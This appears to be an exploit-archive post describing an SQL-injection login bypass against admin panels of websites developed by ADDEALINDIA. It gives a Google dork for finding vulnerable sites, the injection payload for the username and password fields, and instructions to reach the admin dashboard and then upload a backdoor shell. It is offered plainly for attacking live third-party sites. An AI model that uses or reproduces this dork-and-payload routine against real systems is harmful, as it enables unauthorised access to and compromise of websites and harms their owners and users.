ADDEALINDIA Vulnerabelity Bypass Login Admin

2021.02.04

Div007 A.K.a Radiv (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Developed by ADDEALINDIA" site:

# Exploit Title : ADDEALINDIA Vulnerabelity Bypass Login Admin
# Author Nick : Div007
# Date : 02-01-2021
# Greetz : Klaten Ghost | BLACK CODER ANONYMOUS [BCA-X666X] | RETURN OF BL4CKH4MM3R [ROBH]
# Blog : https://www.klaten-ghost.my.id/

#################################
[**] Exploit/PoC :

Payload :
Username/Password : '=''or

First dorking, select a site, then add / admin behind the site, for example: site.com/admin
enter username / password: '=' 'or. If your login is successful you will be taken to the admin panel [dashbosrd admin]
You know what to do when on the dashboard, you can upload the backdoor shell: D

#################################

[**] Contact : 
Gmail : radivganteng17@gmail.com
Instagram : radivahmadg_

References:

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ADDEALINDIA Vulnerabelity Bypass Login Admin

Dork: intext:"Developed by ADDEALINDIA" site:

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.